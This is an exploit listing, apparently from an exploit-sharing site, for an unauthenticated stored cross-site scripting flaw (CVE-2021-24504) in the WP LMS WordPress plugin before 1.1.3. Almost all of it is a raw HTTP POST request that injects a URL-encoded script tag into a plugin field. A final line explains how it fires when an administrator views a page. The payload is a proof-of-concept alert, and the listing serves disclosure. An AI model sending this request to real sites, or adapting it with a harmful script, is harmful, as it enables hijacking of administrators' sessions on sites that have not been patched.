Exploit for WP LMS < 1.1.3 - Unauthenticated Stored Cross-Site Scripting (XSS) CVE-2021-24504

Name: Exploit for WP LMS < 1.1.3 - Unauthenticated Stored Cross-Site Scripting (XSS) CVE-2021-24504
Rating: 5 (65 reviews)

2021-05-24 | CVSS 4.3

## https://sploitus.com/exploit?id=WPEX-ID:E0182508-23F4-4BDB-A1EF-1D1BE38F3AD1
POST /wp-admin/admin.php?page=jslm_fieldordering&task=saveuserfield HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 207
Connection: close
Upgrade-Insecure-Requests: 1

fieldtitle=Image%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&published=1&isvisitorpublished=1&required=0&search_user=1&search_visitor=1&form_request=jslearnmanager&id=28&isuserfield=0&fieldfor=3&save=Save

Then visit /wp-admin/admin.php?page=jslm_fieldordering&ff=3 as admin to trigger the XSS. It may also be triggered elsewhere